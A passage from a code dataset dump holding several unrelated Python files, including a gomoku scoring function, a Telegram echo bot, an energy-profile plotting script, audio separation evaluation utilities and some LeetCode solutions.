'b_2',\n # (2,0,0,0,2): 'b_2',\n (0,2,2,0,0): 'b_2c',\n (0,2,0,2,0): 'b_2',\n # (0,2,0,0,2): 'b_2',\n (0,0,2,2,0): 'b_2c',\n (0,0,2,0,2): 'b_2',\n (0,0,0,2,2): 'b_2c'\n }\n\nscore_table = {\n 'b_5':-100000000,\n 'b_4c': -500,\n 'b_4': -500,\n 'b_3c': -100,\n 'b_3': -100,\n 'b_2c': -10,\n 'b_2': -1,\n\n 'l_5': 400000000,\n 'l_4c': 2000,\n 'l_4': 2000,\n 'l_3c': 400,\n 'l_3': 400,\n 'l_2c': 40,\n 'l_2': 4,\n\n 'z': 0\n }\n\ndef do_cprofile(func):\n def profiled_func(*args, **kwargs):\n profile = cProfile.Profile()\n try:\n profile.enable()\n result = func(*args, **kwargs)\n profile.disable()\n return result\n finally:\n profile.print_stats()\n return profiled_func\n\ndef score(board,witdh,nplayer):\n\n pat_l = []\n boardrot = np.rot90(board)\n psize = 5\n ret = 0\n\n for x in xrange(0, witdh):\n for y in xrange(0, witdh - psize + 1):\n a = tuple(board[x:x + 1, y:y + psize].flatten())\n b = tuple(board[y:y + psize, x:x + 1].flatten())\n\n if a in type_table:\n # pat_l.append(type_table[a]) \n ret += score_table[type_table[a]]\n if b in type_table:\n # pat_l.append(type_table[b]) \n ret += score_table[type_table[b]]\n\n for x in xrange(-witdh, witdh):\n for y in xrange(0, witdh - psize + 1):\n a = tuple(board.diagonal(x)[y:y+psize])\n b = tuple(boardrot.diagonal(x)[y:y+psize])\n if a in type_table:\n ret += score_table[type_table[a]]\n # pat_l.append(type_table[a]) \n if b in type_table:\n ret += score_table[type_table[b]]\n # pat_l.append(type_table[b]) \n if nplayer == 1:\n return ret\n else:\n return -ret\n\ndef computescore(board,width,nplayer,xmov,ymov): # pro dane souradnice xmov,ymov spocitam skore sloupce,radku a diagonal\n board = board\n newPatt = []\n boardrot = np.rot90(board)\n psize = 5\n ret = 0\n\n\n c = tuple(board.diagonal(-xmov+ymov))\n d = tuple(boardrot.diagonal(-width+1+ymov+xmov))\n a = tuple(board[xmov:xmov + 1].flatten())\n b = tuple(boardrot[-ymov-1].flatten())\n \n for x in xrange(0,len(a)-psize+1):\n aa = tuple(a[x:x+psize])\n if aa in type_table:\n newPatt.append(type_table[aa]) \n ret += score_table[type_table[aa]]\n\n for x in xrange(0,len(b)-psize+1):\n bb = tuple(b[x:x+psize])\n if bb in type_table:\n newPatt.append(type_table[bb]) \n ret += score_table[type_table[bb]]\n\n for x in xrange(0,len(c)-psize+1):\n cc = tuple(c[x:x+psize])\n if cc in type_table:\n newPatt.append(type_table[cc]) \n ret += score_table[type_table[cc]]\n\n for x in xrange(0,len(d)-psize+1):\n dd = tuple(d[x:x+psize])\n if dd in type_table:\n newPatt.append(type_table[dd]) \n ret += score_table[type_table[dd]]\n\n\n return ret\n\n","sub_path":"vlastni/flask/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":5411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"240057403","text":"import cupy as cp\r\nimport pandas as pd\r\nimport cudf\r\nimport dask_cudf\r\n\r\ndef good_neigbour(df):\r\n \"\"\"\r\n Computation of a big correlation matrix. Should be done on a GPU. We could not test this, as there is no gpu support\r\n on power. We expect that dask_cudf works on x86.\r\n :param df:\r\n :return:\r\n \"\"\"\r\n cuda = cudf.DataFrame(df)\r\n df = dask_cudf.from_cudf(cuda, npartitions=2)\r\n\r\n df = df.groupby(['account', 'date'])['volume'].sum()\r\n\r\n unique_market_parties = df.index.get_level_values('account').unique()\r\n timepoints = df.index.get_level_values('date').unique()\r\n index = pd.MultiIndex.from_product([unique_market_parties, timepoints], names=['account', 'date'])\r\n corss_account_owners_timepoints = pd.DataFrame(index=index)\r\n corss_account_owners_timepoints = corss_account_owners_timepoints.sort_values(['account', 'date'])\r\n\r\n df = pd.merge(df, corss_account_owners_timepoints, on=['account', 'date'], how=\"outer\")\r\n df['volume'] = df['volume'].fillna(0)\r\n df = df['volume']\r\n\r\n cor = df.unstack(level='account').corr()\r\n\r\n cor.index = cor.index.rename('center')\r\n cor.columns = cor.columns.rename('Peripherie')\r\n cor = cor.stack()\r\n cor.name = 'correlation'\r\n cor = cor.to_frame()\r\n\r\n buddy = cor.groupby('center')['correlation'].nsmallest(1)\r\n\r\n return buddy","sub_path":"assets/jupyterlab/special_score/gpu_calculation.py","file_name":"gpu_calculation.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"381509511","text":"T = int(input())\r\n\r\nfor _ in range(T):\r\n N = int(input())\r\n result = N\r\n score = []\r\n for _ in range(N):\r\n score.append(list(map(int, input().split())))\r\n score.sort(key=lambda x: x[0])\r\n minScore = score[0][1]\r\n for i in score:\r\n if i[1] > minScore:\r\n result -= 1\r\n else:\r\n minScore = i[1]\r\n\r\n print(result)","sub_path":"SOPTAC/3주차(그리디)/신입 사원 #1946.py","file_name":"신입 사원 #1946.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"63694801","text":"#!/usr/bin/python3\n###### this is the second .py file ###########\n\n####### write your code here ##########\n#function definition to rotate a string d elemets to right\ndef rotate_right(array,d):\n r1=array[0:len(array)-d] # taking first n-d letters\n r2=array[len(array)-d:] # last d letters\n rotate = r2+r1 # reversed the order\n return rotate #return ststement\n\n\n\ndecrypted=\"\" # decrypted string will be stored here\n#k1=int(input(\"Enter the amount by which key1 elemets to be rotated\\n Decryption key1 = : \"))\n#k2=int(input(\"\\nDecryption key2 = : \"))\n#k3=int(input(\"\\nDecryption key3 = : \"))\nprint(\"Enter Key\")\nj1,j2,j3 =input().split(\" \")\nk1=int(j1)\nk2=int(j2)\nk3=int(j3)\nquer_str = input(\"Enter Encrypted string\\n\")\nprint(quer_str)\nalphabets=\"abcdefghijklmnopqrstuvwxyz_\"\nalphabets1=alphabets[0:9]\nalphabets2=alphabets[9:18]\nalphabets3=alphabets[18:27]\n# Declaring Strings to store different key characters\nkey1=\"\"\nkey2=\"\"\nkey3=\"\"\n# Seperating keys for different range\nfor i in quer_str :\n for j in alphabets1:\n if i==j :\n key1 = key1 + str(i)\n\n for k in alphabets2:\n if i==k :\n key2 = key2 + str(i)\n\n for l in alphabets3:\n if i==l:\n key3 = key3 + str(i)\n\n# keys sorted according to input numbers by which they are to be shifted\nnew_k1=rotate_right(key1,k1)\nnew_k2=rotate_right(key2,k2)\nnew_k3=rotate_right(key3,k3)\nindex1=0\nindex2=0\nindex3=0\n# Decrypting a string and printing original decrypted string\nfor i in quer_str:\n for j in new_k1 :\n if i==j:\n decrypted=decrypted+new_k1[index1]\n index1 = index1+1\n\n for k in new_k2 :\n if i==k :\n decrypted=decrypted+new_k2[index2]\n index2=index2+1\n\n for l in new_k3 :\n if i==l :\n decrypted=decrypted+new_k3[index3]\n index3=index3+1\n\nprint(\"Decrypted string is : \",decrypted)\n","sub_path":"ps2.py","file_name":"ps2.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"76112694","text":"#!/usr/bin/env python\nfrom samplebase import SampleBase\nfrom rgbmatrix import graphics\nimport time\nimport random\n\n\nclass FixedText(SampleBase):\n def __init__(self, *args, **kwargs):\n super(FixedText, self).__init__(*args, **kwargs)\n self.parser.add_argument(\"-t\", \"--text\", help=\"The text to display. Format <line 1>::<line 2>\", default=\"Line 1: Line 2\")\n\n def run(self):\n canvas = self.matrix\n font = graphics.Font()\n font.LoadFont(\"animation/fonts/5x7.bdf\")\n\n line1_color = []\n line2_color = []\n for i in range(3):\n line1_color.append(random.randint(0, 255))\n line2_color.append(random.randint(0, 255))\n\n l1_color = graphics.Color(*tuple(line1_color))\n l2_color = graphics.Color(*tuple(line2_color))\n line1, line2 = self.args.text.strip().split('::')\n graphics.DrawText(canvas, font, 0, 7, l1_color, line1)\n graphics.DrawText(canvas, font, 0, 14, l2_color, line2)\n\n while True:\n time.sleep(2) \n\n\n# Main function\nif __name__ == \"__main__\":\n fixed_text = FixedText()\n if (not fixed_text.process()):\n fixed_text.print_help()\n","sub_path":"pubsub/animation/fixed-text.py","file_name":"fixed-text.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"623703652","text":"# -*- coding: utf-8 -*-\n\nfrom actor import teen_backend_list, army_backend_list, teen_activity_list, army_activity_list, status, logger\nfrom actor.__version__ import __logo__\nfrom actor.browser import login, get_pending_activities, show_pending, start_browser, \\\n login_backends, open_activities, get_all_activity_try_urls, get_army_activity_try_urls, add_date_filters\nfrom actor.cli import cli\nfrom actor.utils import sort_urls_by_activities\n\ndriver = None\n\n\ndef main():\n global driver # use global driver to avoid selenium closing browser\n print(__logo__)\n login()\n\n teen_urls = get_all_activity_try_urls(teen_backend_list, teen_activity_list, status=status)\n army_urls = get_army_activity_try_urls(army_backend_list, army_activity_list, status=status)\n urls = sort_urls_by_activities(army_urls + teen_urls)\n urls = add_date_filters(urls)\n pending = get_pending_activities(urls)\n show_pending(pending)\n\n driver = start_browser()\n login_backends(driver, {activity['backend'] for activity in pending})\n # login_examine(driver)\n open_activities(driver, pending)\n\n\nif __name__ == \"__main__\":\n try:\n # main()\n cli()\n except Exception as e:\n logger.exception(e)\n raise\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"363229470","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport xlrd\nimport sys\nimport re\nfrom adjustText import adjust_text\n\n\ndef curve_points(y_small, y_large, direction):\n \"\"\"产生余弦曲线插点\"\"\"\n if direction == \"up\":\n # 上升余弦曲线,产生纵轴y的插值点\n x_up = np.linspace(np.pi, 2 * np.pi, 50)\n y_curve = [y_small + (y_large - y_small) * (j + 1) / 2 for j in np.cos(x_up).tolist()]\n else:\n # 下降余弦曲线,产生纵轴y的插值点\n x_down = np.linspace(0, np.pi, 50) # 下降余弦曲线横坐标\n y_curve = [y_small + (y_large - y_small) * (j + 1) / 2 for j in np.cos(x_down).tolist()]\n return y_curve\n\n\ndef interpolate_cos(x, y):\n \"\"\"在反应路径驻点上产生一系列余弦曲线插值点\"\"\"\n x_new = []\n y_smooth = []\n\n # 1. 延伸起始点\n x_pre_temp = np.linspace(x[0] - 1, x[0], 50).tolist()\n # 下降余弦曲线,产生纵轴y的插值点,与初始两个点间曲线对称\n y_pre_temp = curve_points(y[0], y[1], \"down\")\n x_new = x_new + x_pre_temp\n y_smooth = y_smooth + y_pre_temp\n\n # 2. 中间点插值\n for i in range(len(x) - 1):\n x_new_temp = np.linspace(x[i], x[i + 1], 50).tolist() # 产生横轴x的插值点\n if y[i] < y[i + 1]:\n y_smooth_temp = curve_points(y[i], y[i+1], \"up\") # 上升余弦曲线,产生纵轴y的插值点\n else:\n y_smooth_temp = curve_points(y[i+1], y[i], \"down\") # 下降余弦曲线,产生纵轴y的插值点\n x_new = x_new + x_new_temp # 包含所有横坐标点的列表\n y_smooth = y_smooth + y_smooth_temp # 包含所有纵坐标点的列表\n\n # 3. 延伸末端点\n x_post_temp = np.linspace(x[-1], x[-1] + 1, 50).tolist()\n # 上升余弦曲线,产生纵轴y的插值点,与最后两个点间曲线对称\n y_post_temp = curve_points(y[-1], y[-2], \"up\")\n x_new = x_new + x_post_temp\n y_smooth = y_smooth + y_post_temp\n\n return x_new, y_smooth # 返回所有插值点的坐标\n\n\ndef plot_curve(x, y, color, path_label, TextLabel, FontSize=22):\n \"\"\"绘制多条平滑曲线型能垒图\"\"\"\n x_new_array = []\n y_smooth_array = []\n for i in range(len(y)): # 遍历所有列的能量值\n x_strip = []\n y_strip = []\n for j in range(len(y[i])):\n if y[i][j] != \"\": # 剔除空数据\n y_strip.append(y[i][j])\n x_strip.append(x[j])\n\n plt.scatter(x_strip, y_strip, linewidth=6, color=color[i]) # 绘制散点图\n x_new, y_smooth = interpolate_cos(x_strip, y_strip) # 调用插点函数,生成插点坐标\n plt.plot(x_new, y_smooth, linewidth=4, label=path_label[i], color=color[i]) # 绘制平滑曲线\n x_new_array = np.append(x_new_array, x_new)\n y_smooth_array = np.append(y_smooth_array, y_smooth)\n\n # 标记能量值,偏移量视具体情况而定\n if TextLabel == 'True':\n for j in range(len(x_strip)):\n texts = [plt.text(x_strip[j], y_strip[j], \"{:.1f}\".format(y_strip[j]), fontsize=FontSize,\n color=color[i])] # 标记能量值,偏移量视具体情况而定\n adjust_text(texts, x_new_array, y_smooth_array) # 调用adjust_text,尽可能避免文字文字、文字与曲线重叠\n\n\ndef line_split(x, y, color, TextLabel, FontSize=22):\n \"\"\"绘制单条分段实线图\"\"\"\n y_new = []\n x_new = []\n # 1.生成新的XY坐标点,个数加倍\n for i in range(len(y)):\n if y[i] != \"\": # 剔除空数据\n y_new.append(y[i])\n y_new.append(y[i])\n x_new.append(2*i+1)\n x_new.append(2*i+2)\n # 2.绘制实线折线图\n i = 0\n while i < len(y_new):\n x_line = [x_new[i], x_new[i+1]]\n y_line = [y_new[i], y_new[i+1]]\n plt.plot(x_line, y_line, linestyle='-', linewidth=6, color=color)\n i += 2\n # 3.添加能量值文本标签\n if TextLabel == 'True':\n for j in range(len(x)):\n if y[j] != \"\":\n plt.text(x[j] * 2 - 0.9, y[j] + 0.4, \"{:.1f}\".format(y[j]), fontsize=FontSize, color=color)\n return x_new, y_new\n\n\ndef plot_line_dot(x, y, color, path_label, TextLabel, FontSize=22):\n \"\"\"绘制多条虚实折线图\"\"\"\n y_max, y_min = y_extreme(y) # 获取y值的最大值和最小值\n y_bias = (y_max - y_min) / 50 # 获取文本标签y方向偏移量\n if isinstance(path_label, list): # 多条路径的情况\n for i in range(len(y)): # 遍历所有列的能量值\n # 绘制分段实线折线图\n x_new, y_new = line_split(x[i], y[i], color[i], TextLabel=\"False\")\n # 绘制虚线折线图\n plt.plot(x_new, y_new, linestyle='--', linewidth=5, color=color[i], label=path_label[i])\n # 标记能量值,偏移量视具体情况而定\n if TextLabel == 'True':\n for j in range(len(x)):\n if y[i][j] != \"\":\n plt.text(x[j] * 2 - 0.9, y[i][j] + y_bias, \"{:.1f}\".format(y[i][j]), fontsize=FontSize,\n color=color[i])\n else: # 单条路径的情况\n # 绘制分段实线折线图\n x_new, y_new = line_split(x, y, color, TextLabel=\"False\")\n # 绘制虚线折线图\n plt.plot(x_new, y_new, linestyle='--', linewidth=5, color=color, label=path_label)\n\n # 标记能量值,偏移量视具体情况而定\n if TextLabel == 'True':\n for j in range(len(x)):\n if y[j] != \"\":\n plt.text(x[j] * 2 - 0.9, y[j] + y_bias, \"{:.1f}\".format(y[j]), fontsize=FontSize, color=color)\n\n\ndef plot_line_curve(y_ini, _xtick_labels, color, PathLabel, TextLabel, FontSize=22):\n \"\"\"单条曲线:根据中间体及过渡态类型绘制能垒图,对中间体绘制横线,对过渡态绘制曲线\"\"\"\n # 1. 数据预处理\n x_ini = [i * 2 + 2 for i in range(len(y_ini))] # 产生x轴坐标\n x = []\n y = []\n for i in range(len(y_ini)):\n if y_ini[i] != \"\":\n if re.match(r\"^TS\", _xtick_labels[i]) is not None: # 判断是否为TS数据点,若是,将y值添加到新的列表中\n y.append(y_ini[i])\n x.append(x_ini[i])\n else: # 若否,将y值分两次添加到新的列表中\n y.append(y_ini[i])\n y.append(y_ini[i])\n x.append(x_ini[i]-0.5)\n x.append(x_ini[i]+0.5)\n\n # 2. 产生插值点\n x_new = []\n y_smooth = []\n for i in range(len(x) - 1):\n # 产生横轴x的插值点\n x_new_temp = np.linspace(x[i], x[i + 1], 50).tolist()\n if y[i] < y[i + 1]:\n # 上升余弦曲线,产生纵轴y的插值点\n y_smooth_temp = curve_points(y[i], y[i+1], \"up\")\n elif y[i] > y[i + 1]:\n # 下降余弦曲线,产生纵轴y的插值点\n y_smooth_temp = curve_points(y[i+1], y[i], \"down\")\n else:\n # 长横线\n y_smooth_temp = np.linspace(y[i], y[i+1], 50).tolist()\n x_new = x_new + x_new_temp # 包含所有横坐标点的列表\n y_smooth = y_smooth + y_smooth_temp # 包含所有纵坐标点的列表\n\n # 3. 绘制曲线\n plt.plot(x_new, y_smooth, linewidth=6, color=color, label=PathLabel) # 绘制曲线\n\n # 4. 添加能量值文本标签\n if TextLabel == 'True':\n # 添加能量值文本标签\n for i in range(len(y_ini)):\n # 标记能量值,偏移量视具体情况而定\n if y_ini[i] != \"\":\n texts = [plt.text(x_ini[i] - 0.2, y_ini[i] + 0.06, \"{:.1f}\".format(y_ini[i]), fontsize=FontSize, color=color)]\n adjust_text(texts, x_new, y_smooth) # 调用adjust_text,尽可能避免文字文字、文字与曲线重叠\n\n return x_ini # 返回x标签点,用于绘制x轴标签\n\n\ndef plot_scatter(x_sticks, y, color, path_label, TextLabel, FontSize=22):\n \"\"\"作散点图,并以长横线显示数据点\"\"\"\n for i in range(len(y)): # 遍历所有列的能量值\n y_strip = []\n x_strip = []\n for j in range(len(y[i])):\n if y[i][j] != \"\": # 剔除空数据\n x_strip.append(x_sticks[j])\n y_strip.append(y[i][j])\n # 添加文本标签\n if TextLabel == \"True\":\n plt.text(x_sticks[j] - 0.3, y[i][j] + 0.06, \"{:.1f}\".format(y[i][j]), fontsize=FontSize, color=color[i])\n # 绘制其他自旋态,画横线\n plt.scatter(x_strip, y_strip, linewidth=6, color=color[i], label=path_label[i], marker='_', s=1200)\n\n\ndef y_extreme(y):\n \"\"\"返回y列表中的最大值和最小值\"\"\"\n nest = \"False\"\n for i in y:\n if isinstance(i, list):\n nest = \"True\" # 若是嵌套列表,给nest赋值为True\n break\n if nest == \"True\":\n temp = sum(y, []) # 展开y列表\n else:\n temp = y\n temp = [i for i in temp if i != \"\"] # 剔除空数据\n y_max, y_min = max(temp), min(temp)\n return y_max, y_min\n\n\ndef y_list_min(y):\n \"\"\"寻找每行的最小值,并返回一个最小值的列表\"\"\"\n y_T = np.array(y).T.tolist() # 转置y列表数据\n y_min = []\n for i in range(len(y_T)):\n for j in range(y_T[i].count(\"\")):\n y_T[i].remove(\"\") # 删除空数据\n y_min.append(min(list(map(float, y_T[i])))) # 返回每行的最小值,添加到y_min_list列表中\n return y_min\n\n\n# 1. 导入数据\nExcelFile = xlrd.open_workbook(sys.argv[1]) # 读取Excel数据\nsheet = ExcelFile.sheet_by_index(0) # 读取Excel的第一个sheet\n_xtick_labels = sheet.col_values(0)[5:] # 读取第一列数据,反应路径驻点的名称\npic_title = sheet.row_values(0)[1] # 读取图片标题\nX_title = sheet.row_values(1)[1] # 读取X轴标题\nY_title = sheet.row_values(2)[1] # 读取Y轴标题\npath_label = sheet.row_values(3)[1:] # 读取第一行数据,不同反应路径的名称\ncolor = sheet.row_values(4)[1:]\nx = [i+1 for i in range(len(_xtick_labels))] # 生成横坐标\ny = []\nfor i in range(len(sheet.row_values(0))-1):\n y.append(sheet.col_values(i+1)[5:]) # 读取除第一列外的所有列数据,即纵坐标能量值\n\ny_min_list = y_list_min(y) # 返回所有中间体及过渡态中最稳定自旋态的能量值\n\n# 2. 绘制图像\nplt.figure(figsize=(15, 9), dpi=80) # 设置图片大小及分辨率\n\nplot_style = int(sys.argv[2])\nTextLabel = str(sys.argv[3]) # 是否添加坐标点对应的数值文本标签\nFontSize = 22 # 设置能量值文本大小,默认值为22,可根据需要修改\nAxis_FontSize = 20 # 设置XY轴标签及标题大小,默认值为20,可根据需要修改\nif plot_style == 1: # 绘制平滑曲线\n plot_curve(x, y, color, path_label, TextLabel, FontSize)\n plt.xlim(x[0] - 0.5, x[-1] + 0.5) # x轴刻度范围\n plt.xticks(x, _xtick_labels, fontsize=Axis_FontSize) # x轴标签\nelif plot_style == 11:\n x_new, y_smooth = interpolate_cos([i * 2 - 0.5 for i in x], y_min_list) # 调用插点函数,生成插点坐标\n plt.plot(x_new, y_smooth, color=\"grey\", label=None, linewidth=6) # 绘制平滑曲线\n plot_scatter([i * 2 - 0.5 for i in x], y, color, path_label, TextLabel, FontSize)\n plt.xlim(x[0] * 2 - 1.5, x[-1] * 2 + 1) # x轴刻度范围\n plt.xticks([i * 2 - 0.5 for i in x], _xtick_labels, fontsize=Axis_FontSize) # x轴标签\nelif plot_style == 2: # 绘制虚实折线\n plot_line_dot(x, y, color, path_label, TextLabel, FontSize)\n plt.xlim(x[0] * 2 - 1.5, x[-1] * 2 + 1) # x轴刻度范围\n plt.xticks([i * 2 - 0.5 for i in x], _xtick_labels, fontsize=Axis_FontSize) # x轴标签\nelif plot_style == 22: # # 对不同自旋态,只给最稳定态绘制虚实折线\n plot_line_dot(x, y_min_list, \"grey\", None, TextLabel=\"False\") #\n for i in range(len(y)):\n line_split(x, y[i], color[i], TextLabel=\"False\")\n plot_scatter([i * 2 - 0.5 for i in x], y, color, path_label, TextLabel, FontSize)\n plt.xlim(x[0] * 2 - 1.5, x[-1] * 2 + 1) # x轴刻度范围\n plt.xticks([i * 2 - 0.5 for i in x], _xtick_labels, fontsize=Axis_FontSize) # x轴标签\nelif plot_style == 3: # 绘制横线&平滑曲线\n for i in range(len(y)): # 遍历所有列的能量值\n x_sticks = plot_line_curve(y[i], _xtick_labels, color[i], path_label[i], TextLabel, FontSize)\n plt.xticks(x_sticks, _xtick_labels, fontsize=Axis_FontSize) # x轴标签\nelse: # 33 对不同自旋态,只能最稳定态绘制横线&平滑线,其他点绘制横线\n x_sticks = plot_line_curve(y_min_list, _xtick_labels, \"grey\", None, TextLabel=\"False\") # 绘制平滑线\n plt.xticks(x_sticks, _xtick_labels, fontsize=Axis_FontSize) # x轴标签\n plot_scatter(x_sticks, y, color, path_label, TextLabel, FontSize)\n\n# 若x轴标签过长产生重叠,可设置旋转角度,比如rotation=-90, HorizontalAlignment=\"right\"\n\n# 3. 图片设置\ny_max, y_min = y_extreme(y) # 获取y值的最大值和最小值\ny_scale = (y_max - y_min) / 10 # y轴延伸长度\nplt.ylim(y_min - y_scale, y_max + y_scale) # y轴刻度范围\nplt.yticks(fontsize=Axis_FontSize) # y轴标签\n# plt.xlabel(X_title, fontsize=Axis_FontSize) # 横轴标题\nplt.ylabel(Y_title, fontsize=Axis_FontSize) # 纵轴标题\n# plt.title(pic_title, fontsize=Axis_FontSize) # 图标题\n\nplt.legend(fontsize=Axis_FontSize-2, loc=\"upper right\") # 添加图例,位置在左上角\nplt.tight_layout() # 图像外部边缘的调整\n\n# plt.show() # 展示图片\nplt.savefig(\"./EnergyProfile.png\") # 保存图片到当前目录\n","sub_path":"2019/08/09/matplotlib绘制势能面剖面图/Plot_EnergyProfile.py","file_name":"Plot_EnergyProfile.py","file_ext":"py","file_size_in_byte":13696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"388650384","text":"class Solution(object):\n def plusOne(self, digits):\n \"\"\"\n :type digits: List[int]\n :rtype: List[int]\n \"\"\"\n carry = 1\n for idx, num in enumerate(reversed(digits)):\n sum = num + carry\n carry, digits[~idx] = sum / 10, sum % 10\n return [carry] + digits if carry else digits\n","sub_path":"Plus One.py","file_name":"Plus One.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"97393911","text":"from numpy import *\r\nimport os\r\nimport librosa\r\nimport matplotlib.pyplot as plt\r\n\r\ndef eval_sisnr(s_hat,s):\r\n\tif s_hat.shape[0]==s.shape[0]:\r\n\t\teps = finfo(float32).eps;\r\n\t\ts_target=(dot(s_hat,s)/dot(s,s))*s\r\n\t\ts_error=s_hat-s_target\r\n\t\tsisnr=10*log10(max(dot(s_target,s_target),eps)/max(dot(s_error,s_error),eps))\r\n\t\treturn sisnr\r\n\telse:\r\n\t\tprint('They need to have same dimension')\r\n\t\treturn None\r\n\r\ndef evaluation(s1,s2,mixture,folder):\r\n\t# s1,s2 is numpy.ndarray mixture is Mixture()\r\n\r\n\tif os.path.exists(folder+'male_estimated.wav'):\r\n\t\tos.remove ( folder+'male_estimated.wav')\r\n\tif os.path.exists (folder+'female_estimated.wav' ):\r\n\t\tos.remove ( folder+'female_estimated.wav' )\r\n\tif os.path.exists(folder+'mix.wav'):\r\n\t\tos.remove ( folder+'mix.wav' )\r\n\tif os.path.exists(folder+'male_origin.wav'):\r\n\t\tos.remove ( folder+'male_origin.wav' )\r\n\tif os.path.exists ( folder+'female_origin.wav' ):\r\n\t\tos.remove ( folder+'female_origin.wav' )\r\n\tmale_sisdr=eval_sisnr ( s1, mixture.wav1 )\r\n\tfemale_sisdr=eval_sisnr( s2, mixture.wav2 )\r\n\tmale_o_sisdr=eval_sisnr(mixture.wav1+mixture.wav2,mixture.wav1)\r\n\tfemale_o_sisdr=eval_sisnr ( mixture.wav1 + mixture.wav2,mixture.wav2 )\r\n\t\r\n\twith open(folder+'evaluation_results.txt','w') as f:\r\n\t\tseq=['male_sisdr:'+str(male_sisdr)+'\\n','sisdr between mixture and male sound:'+str(male_o_sisdr)+'\\n',\r\n\t\t 'female_sisdr:'+str(female_sisdr)+'\\n','sisdr between mixture and female sound:'+str(female_o_sisdr)+'\\n']\r\n\t\tf.writelines(seq)\r\n\t\r\n\tlibrosa.output.write_wav(folder+'mix.wav',mixture.wav1 + mixture.wav2,16000)\r\n\tlibrosa.output.write_wav ( folder + 'male_origin.wav', mixture.wav1, 16000 )\r\n\tlibrosa.output.write_wav ( folder + 'female_origin.wav', mixture.wav2, 16000 )\r\n\tlibrosa.output.write_wav(folder+'male_estimated.wav',s1,16000)\r\n\tlibrosa.output.write_wav ( folder+'female_estimated.wav' ,s2,16000)\r\n\r\n\tprint ( 'male_sisdr:',male_sisdr )\r\n\tprint('sisdr between mixture and male sound:',male_o_sisdr)\r\n\tprint ( 'female_sisdr:',female_sisdr )\r\n\tprint ( 'sisdr between mixture and female sound:', female_o_sisdr )\r\n\r\n","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"477731180","text":"import os\r\n\r\nfrom flask import Flask, request\r\n\r\nimport telebot\r\n\r\nTOKEN = os.environ[\"telekey\"]\r\nURLHe = os.environ[\"herokuurl\"]\r\nprint(\"HOLa\")\r\nprint(TOKEN)\r\nbot = telebot.TeleBot(TOKEN)\r\nserver = Flask(__name__)\r\n\r\n\r\n@bot.message_handler(commands=['start'])\r\ndef start(message):\r\n bot.reply_to(message, 'Hola, ' + message.from_user.first_name)\r\n\r\n\r\n@bot.message_handler(func=lambda message: True, content_types=['text'])\r\ndef echo_message(message):\r\n bot.reply_to(message, message.text)\r\n\r\n\r\n@server.route('/'+TOKEN, methods=['POST'])\r\ndef getMessage():\r\n bot.process_new_updates([telebot.types.Update.de_json(request.stream.read().decode(\"utf-8\"))])\r\n return \"!\", 200\r\n\r\n\r\n@server.route(\"/\")\r\ndef webhook():\r\n bot.remove_webhook()\r\n bot.set_webhook(url=URLHe+TOKEN)\r\n return \"!\", 200\r\n\r\n\r\nif __name__ == \"__main__\":\r\n server.run(host=\"0.0.0.0\", port=int(os.environ.get('PORT', 5000)),debug=True)","sub_path":"Bot.py","file_name":"Bot.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"650908262","text":"\"\"\"\nG'DAY default control flags\n\nRead into the model unless the user changes these at runtime with definitions\nin the .INI file\n\n\"\"\"\n\n__author__ = \"Martin De Kauwe\"\n__version__ = \"1.0 (05.09.2011)\"\n__email__ = \"mdekauwe@gmail.com\"\n\nalloc_model = \"fixed\" # C allocation -> fixed or allometric\nassim_model = \"mate\" # bewdy or mate?\nnuptake_model = 1 # 0=constant uptake, 1=func of N inorgn, 2=depends on rate of soil N availability\ntrans_model = 1 # 0=trans from WUE, 1=Penman-Monteith, 2=Priestley-Taylor\nfixleafnc = False # fixed leaf N C ?\npassiveconst = False # hold passive pool at passivesoil\nprint_options = \"daily\" # \"daily\"=every timestep, \"end\"=end of run\ngrazing = False # Is foliage grazed?\nuse_eff_nc = 0 # use constant leaf n:c for metfrac s\nstrfloat = 0 # Structural pool input N:C varies=1, fixed=0\nuse_leuning = 0 \nfixed_stem_nc = True # False=vary stem N:C with foliage, True=fixed stem N:C\ndeciduous_model = False # evergreen_model=False, deciduous_model=True\ncalc_sw_params = False # false=user supplies field capacity and wilting point, true=calculate them based on cosby et al.\nwater_stress = True # water stress modifier turned on=1 (default)...ability to turn off to test things without drought stress = 0\nmodeljm = True # modeljm=0, Jmax and Vcmax parameters are read in, modeljm=1, parameters are calculated from leaf N content\nmodel_optroot = False # Ross's optimal root model...not sure if this works yet...0=off, 1=on\nsw_stress_model = 1 # JULES type linear stress func, or Landsberg and Waring non-linear func\nps_pathway = \"c3\" # Photosynthetic pathway, c3/c4\n","sub_path":"build/lib/gday/default_control.py","file_name":"default_control.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"28511753","text":"class Solution(object):\n def reorderList(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: no return\n \"\"\"\n if not head or not head.next:\n return\n dummy = ListNode(0)\n middle = self.findMedian(head)\n low, middle.next = middle.next, None\n low = self.reverse(low)\n while head and low:\n dummy.next = head\n head = head.next\n dummy.next.next = low\n low = low.next\n dummy = dummy.next.next\n if head:\n 